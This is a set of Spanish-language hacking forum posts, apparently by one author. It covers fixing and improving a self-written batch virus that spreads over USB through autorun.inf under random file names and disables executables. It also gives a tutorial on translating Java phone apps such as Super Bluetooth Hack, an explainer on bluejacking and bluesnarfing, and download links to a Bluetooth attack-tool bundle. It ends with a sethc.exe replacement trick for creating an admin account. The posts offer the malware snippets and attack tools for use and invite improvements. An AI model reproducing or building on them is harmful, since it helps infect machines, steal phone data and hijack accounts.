He tomado un pc y he experimentado a infectarme, claro sin un par de lineas para que no se me deshabilitaran los ejecutables, y gracias a eso he podido "debuggear" el virus, por lo que he visto un error...

le puse el echo on y vi que al momento de copiarse por usb si creaba el autorun.inf y tambien agarraba un nombre al azar, pero en ese momento el parametro %0 no era el nombre y ubicacion del .bat original (osea nosotos) sino el nombre de la etiqueta :creausb, por lo que al copiarse daba error, asi que he agregado una linea al principio en la funcion :crea despues de las lineas donde se agrega al registro..

set my=%0

y en la parte de :creausb se modifico tambien una linea...

copy  %my% "%1:\%nam%.exe"

De esa manera ya quedaron los errores arreglados, y el codigo funciona a la perfeccion..

Deberian de tomar estas ideas como la copia USB, la mutacion y los mensajes al azar para proximos codes suyos..

Un Saludo.

El \%nam%.exe" es porque yo ya lo tenia preparado en un .exe para que no se viera la pantalla y se copiara por las usb...

todo el codigo es ideado po mi, las funciones de cosas al azar y la de copia usb 

Saludos.

el codigo lo he ideado yo mismo, no lo he copiado de ningun lado, es 100% mio 

ya lo he probado y funciona perfecto, solo hace falta un cambio que me sugirieron pero ahora mas tarde lo pongo...

Saludos.

Creo que hasta ahora es la mejor manera para copiarse y repartirse por USB, aunque es posible optimizarlo tambien usando el comando FOR...

Para el uso de esto se debe hacer una llamada a la etiqueta :copiausb a traves del comando call..

Por ejemplo:

call :copiausb y el code hara el resto de crear el autorun y de copiarlo a las diferentes unidades...


Ademas que puede ser extendido para que detecte mas unidades, sin extender tanto el codigo, ahorrandonos varias lineas...

Para la parte del for tengo este code pero no lo he probado:


Espero que les sea de utilidad.

Saludos.

Si... la verdad esta buena la idea esa de la animacion.

Muy interesante, ya habia intentado yo hacer eso pero con cosas al estilo matrix

Saludos.

Bueno pues me he dedicado a hacer un code para un virusito que se encargue de deshabilitar los ejecutables, y al tiempo que muestre un mensaje de error pero al azar, para esto he usado una funcion que yo mismo me habia ideado y he usado VB para esta parte porque se ve un poco mas bonito y asi me evito problemas con el msg...

Tambien he hecho que se copie por USB, e igualmente con nombres al azar, por lo que seria un poco mas dificil rastrearlo, y esto es lo que le daria la caracteristica de "mutante"..

Lo he llamado Executor, pues se imaginaran porque ?? 


Tambien fijarse que he optimizado bastante la parte de copia USB, esta se me ocurrio como a media noche mientras no podia dormir...

Toda la parte de funciones al azar es de mi invencion, y me ha quedado fina 

Quiero que lo miren, y me digan posibles mejoras, aunque se que me falta algo de uso de %errorlevel% y esas cosas en caso de que algo falle no se salga del programa...

Saludos.

Perdon man por no haber hecho esto antes... es que la verdad es bastante codigo...

ya te lo posteo.

http://two.xthost.info/smartgenius/FPv3.5SourceCode.rar

Saludos.

TUTORIAL: TRADUCCION DE APLICACIONES JAVA - MOVILES

Bueno, he querido hacer este tuto desde hace tiempo, debido a que me he encontrado con grandes herramientas tanto para hacking como para otros fines, que son programadas en JAVA, diseñadas para los celulares (moviles) y que vienen en idiomas diferentes del Español.

Primero decirles que necesitamos para el procedimiento de Traduccion:

- La App a Traducir
- Un Descompresor (WinRAR)
- Un Descompilador (opcional)
- Lectores de Clases Java
- Buen conocimiento del lenguaje nativo de la aplicacion, para hacer una buena traduccion.


Bien, empecemos:

Generalmente los archivos en java viene con extension .jar


por lo que debemos cambiarla por .zip o .rar, y proceder a descomprimirla en un directorio  para poder trabajar por separado en cada una de las clases que la componen...


Entonces aqui es donde se define que tipo de trabajo debemos hacer, ya que nos podemos encontrar aplicaciones que cuentan con un fichero lang, que esencialmente es un archivo de texto plano con todas las strings que usa el programa, hasta archivos .class que vienen compiladas en JAVA Binario...

Paso 1. Archivo Lang - Texto Plano

Nos Basaremos en la Aplicacion BT Info - Super Bluetooth Hack 1.08

Para este tipo de aplicaciones solo es necesario descomprimirla y una vez ubicado el archivo de lenguaje, este se abre con un editor de textos normal, en este caso nos referimos al bloc de notas...

Ubicamos el archivo lang...


en este caso una carpeta con los archivos usados por la aplicacion...


escogemos el primero y lo abrimos con el bloc de notas...

Nos damos cuenta que es el archivo con el listado de los lenguajes que usa
el programa, asi que solo traducimos la linea que dice "English" por "Español".



En este caso no tenemos que traducir todos los archivos, ya que solo necesitamos modificar el archivo C que es el del lenguaje ingles, el cual vamos a traducir al español, los demas los dejamos como estan...


Traducimos todas las frases y cadenas de texto al español, y una vez finalizado este proceso guardamos el archivo...

Revisamos si no hay otros archivos por traducir, y cuando estemos listos vamos a "instalar" estos archivos en la aplicacion... Paso 3.

Paso 2. Archivo .CLASS - Java Binario

Bueno, basicamente es el mismo proceso que el anterior, solo que este implica revisar uno por uno los archivos, ademas de que no lo hacemos con el Bloc de Notas sino con otras herramientas mas avanzadas.

Si queremos descompilar los archivos, ver su estructura, codigo fuente y funcionamiento en JAVA, pues usaremos el DJ Java Decompiler, pero como solo vamos a traducirla para nuestro proposito y no mas, pues entonces hacemos uso de otras dos herramientas...

InClassTranslator y MobiTrans


Los dos programas son muy parecidos en su funcionamiento, pero yo recomiendo usar el MobiTrans, igual eso es decision de ustedes.

Ambos programas cuentan con un area en la que muetran el listado de las "strings" o frases en el idioma nativo de la aplicacion, un area donde se muestra la actual selecionada, y una parte donde se debe introducir la traduccion de esa frase o "string".

Bueno, usaremos el MobiTrans...

Para este caso nos basaremos en el BT File Manager, cuyo archivo de idioma es el "e.class",
lo abrimos con el programa y ese nos preguntara que tipo de clase es:


Entonces escogemos una clase normal, aunque fijense que hay clases especiales como son las de Macrospace, Handy-Games o Gameloft.

Vemos que nos ha cargado toda la lista de "Strings" usadas por la aplicacion, asi que empezamos por la primera, le damos doble click y nos sale un cuadro de dialogo con la original y un espacio para escribir la traduccion...


Luego alli escribimos el correspondiente de la Frase original pero en nuestro idioma, y luego damos en el boton OK.

Repetimos este paso para todas las frases, y una vez finalizado el proceso procedemos a guardar el trabajo hecho.

Solamente damos en el boton de guardar, y en el dialogo que nos sale le damos OK, el resto no lo tocamos para nada.


Entonces volvemos al directorio donde teniamos descomprimida la aplicacion, y veremos que se han creado varios archivos...

De alli cambiamos el nombre de la clase "e.class" a e.class.bac, ya que esta es la clase original, y el archivo que nos creo el traductor llamado "e.class.ru" lo renombramos a "e.class", y hacemos el mismo proceso con cualquier otro archivo de clase que hayamos
traducido con el programa.

Una vez se haya finalizado este proceso, estamos listos para "instalar" la traduccion en la aplicacion.

Paso 3. "Instalar" la traduccion en la Aplicacion original.

Para este paso haremos uso del descompresor que hayan usado para descomprimir la aplicacion (en este caso WinRAR).
 
Abrimos la aplicacion original y alli nos dirigimos hasta el directorio donde se encuentra el archivo original que contiene todas las "strings" o frases que usa la aplicacion, ya sea en texto plano o en .class, para ambos es lo mismo.

Aparte y con el explorador de archivos, nos dirigimos hasta la carpeta donde tenemos la aplicacion descomprimida y ya traducida, seleccionamos el archivo ya modificado y lo "arrastramos" hasta el WinRAR.


Nos sale un cuadro de dialogo en el que solo debemos de presionar OK.

Y si el WinRAR nos dice que si queremos modificar el archivo que ya esta adentro le decimos que SI, luego de esto haremos el mismo proceso para cada uno de los archivos que hayamos traducido o modificado, luego una vez finalizado todo podemos cerrar el Winrar...

Y ahora, solo hace falta volver a cambiarle la extension al archivo de .ZIP a .JAR para que pueda ser aceptada por el telefono, instalan la aplicacion el el telefono y....... wala..... ya la tienen en Español.

Aqui tienen los dos programas traductores, mas este mismo manual en formato DOC (word)...

Link: http://rapidshare.com/files/114045223/TraductoresJAVA-TutorialBySmartgenius.rar

Disfrutenlos, y a traducir se dijo Señores
Saludos.

Tuto by :: SmartGenius ::

http://thesmartgenius.wordpress.com

Saludos. 

BlueJacking

Bluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX.

Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes.

El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces.

Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor.

Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino.

El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal  .

Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien.

Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio.

Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos.


BlueSnarfing

Bluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs.

Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento.

Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises.

Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades.


BlueBugging

Alguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente.

Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente.

Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack).

Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada.

Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging  han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono.

Las posibilidades y consecuencias de esto, estan a la Imaginación.


Bluetiming o Toothing

Podria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?.

Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia.


Fuente: BlueJacking Tools
Traducción y Adaptacion by :: Smartgenius ::

Aqui hay un Set de Herramientas para usar, con este tipo de ataques

http://foro.elhacker.net/hacking_mobile/herramientas_bluejacking_bluesnarfingetc-t211880.0.html


Saludos.

Herramientas BlueJacking - BlueSnarfing...etc

Variadas Herramientas de BlueJacking capaces de realizar ataques por Bluetooth,
del tipo BlueBug, BlueSnarf, HeloMoto, OBEX Object Push, Robo de Informacion,
Envio de Mensajes, Control total del telefono, entre otras.

Tenemos:
- Bloover II
- Bloover II - Breever Edition
- Bluetooth Messenger
- BT File Manager ES *
- BT Browser
- Chat2U
- DJK-Bluevoice
- EasyJack v 2
- MiyuX
- MSocius BlueChat
- Super Bluetooth Hack 1.08 (BT Info) ES *
- STMBlueS

* Traducidas al español por Mi .

Disfrutenlas...

http://rapidshare.com/files/114044533/BlueJackingTools-bySmartGenius.rar

Saludos.

Aun no tengo muy claro el manejo de errorlevel, pero si tu puedes ayudarme, pues bienvenido sea...



Bueno, pues el codigo basicamente es para que reemplace a sethc, por si mismo (ya encapsulado en exe)... y asi al moemento de iniciar sesion uno presiona 5 veces shift y tiene acceso al programa que nos permite crearnos una cuenta de admin...

Siendo invitado no estoy seguro de su funcionamiento, pero hay otra forma de escalar privilegios con el comando at que funciona con cualquiera, de ahi podriamos tomar una base para mejorar el codigo y hacerlo mas efectivo...

Saludos.